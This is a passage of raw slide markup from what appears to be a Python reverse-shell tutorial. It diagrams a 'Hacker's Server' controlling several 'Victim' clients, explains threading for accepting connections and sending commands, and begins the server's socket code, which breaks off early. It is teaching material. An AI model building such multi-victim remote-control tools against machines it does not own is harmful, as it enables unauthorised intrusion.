              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Data (reply)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rectangle 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9328A72E-4803-4226-ACFB-B548F63211B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5870082" y="5449447"/>
            <a:ext cx="1083076" cy="2787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close()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Arrow Connector 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0EA9639-9EC6-407D-910C-FE76B1B2DCCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411620" y="5129851"/>
            <a:ext cx="0" cy="319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06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DC840E-FFF3-4739-98CE-2C3406D5B8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397" y="292964"/>
            <a:ext cx="9877764" cy="6336680"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3979059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743F-71B7-41CC-BAB8-95C54F340FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="878680" y="285226"/>
            <a:ext cx="10515600" cy="433865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple Clients Support</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED58F73-709F-4FA7-B579-C96B5A7F01CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722791" y="896645"/>
            <a:ext cx="10631009" cy="2183906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Now what if we want to control more than one client computers from a single server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>But that will be costly and not feasible too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Assume, you are on a single computer as administrator and you need to have remote access to all computers in a lab, or in the workstation. In this situation, reverse shell program will not work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>So, will now add the functionality of handling all the clients from one single server python file and build a ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>multiple client support system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA9BC3C8-5E05-4073-8C0F-C1DA00CF5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738" y="3866224"/>
            <a:ext cx="2000419" cy="20004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106FC2-2FB9-4522-B8F5-7243B0EEF540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041478" y="4279009"/>
            <a:ext cx="1260281" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacker’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A0EA10-5201-42A8-AF07-F2F2DF05758B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041478" y="3790765"/>
            <a:ext cx="1045030" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1186E9-FA86-4CD2-ACB5-B0297335D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825" y="2889682"/>
            <a:ext cx="1261256" cy="12612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0B09356-487D-466D-A921-1C2C903B365C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7963946" y="3150978"/>
            <a:ext cx="797013" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FE66A2-039B-40B2-8F87-958312BD3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9955" y="4079261"/>
            <a:ext cx="1344994" cy="134499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0184555-F84F-48D1-B947-DB85E8C36306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7963945" y="4418264"/>
            <a:ext cx="797013" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD0F717E-4B3F-4D28-AB9E-52E2C4BAA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825" y="5515131"/>
            <a:ext cx="1344994" cy="134499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7DE5264-95DE-48E1-907E-3F58AC39151F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7963945" y="5818296"/>
            <a:ext cx="797013" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2176D46B-AB54-401D-AE92-3DD7D4ADC074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9076819" y="3258105"/>
            <a:ext cx="1008546" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFC152FA-DEC3-468A-A5C4-CABD3CA4E24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9076819" y="4420483"/>
            <a:ext cx="1008546" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9AB2FDD-6158-488D-85E8-036A7461F26A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078905" y="5804511"/>
            <a:ext cx="1008546" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client.py</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Arrow: Left-Right 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE88D0E-3C1F-4727-9B80-72A701DDDC84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20979387">
            <a:off x="2601985" y="3762627"/>
            <a:ext cx="4661241" cy="2071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Left-Right 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4310EC9-1A02-4790-9681-1E2A37EC6CDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2679558" y="4602930"/>
            <a:ext cx="4661241" cy="2071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Left-Right 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23A5C2C8-8E77-4C34-9832-A6C69F917AB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="693996">
            <a:off x="2653001" y="5384890"/>
            <a:ext cx="4661241" cy="2071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9FA01A00-F3D1-4054-80ED-642157C3FF16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20996022">
            <a:off x="4215686" y="3477230"/>
            <a:ext cx="1535870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conn, address</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117D1FFE-BDBD-486A-A381-8937C06D2D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4659523" y="4310907"/>
            <a:ext cx="1535870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conn, address</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFDC784-1679-4D39-8AF4-29F558C6075D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="803620">
            <a:off x="4637634" y="5199315"/>
            <a:ext cx="1535870" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> conn, address</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193327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88290-008E-453B-ADD0-CE1AB82512FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="589625" y="391759"/>
            <a:ext cx="10515600" cy="460498"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two tasks of Server.py file</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF046881-D3C7-476C-BA3B-A4FA1B118467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506027" y="1615744"/>
            <a:ext cx="11588319" cy="5166790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Listen and accept connections from other clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending commands to an already connected client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These tasks can be achieved on one program by concept ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>threading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thread is a multitasking support system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Speaking – Thread 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thinking – Thread 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Thus, Listen and accept connections from other clients – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check client connected and Sending commands to an already connected client – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Thread 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496A1699-FC50-403E-A394-A1B4891797CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2805343"/>
            <a:ext cx="1209434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14807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F190-0105-4F83-BEAC-B20A81F13D35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554114" y="247172"/>
            <a:ext cx="10515600" cy="433865"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating Connection with Multiple Clients</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C365B43-146E-4FA8-A17C-6BB221930946}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="792332" y="914062"/>
            <a:ext cx="5626223" cy="5478423"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import sys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>import time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>from queue import Queue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>Number_of_threads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> = 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>Job_Number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> = [1,2] # list of thread1 &amp; thread2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>queue = Queue()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>#empty list to store connection &amp; address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>all_connections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> =[]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>all_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>#Create a Socket to connect two computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0" err="1"/>
              <a:t>create_socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>    try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        global s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1400" dirty="0"/>
              <a:t>        host=""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
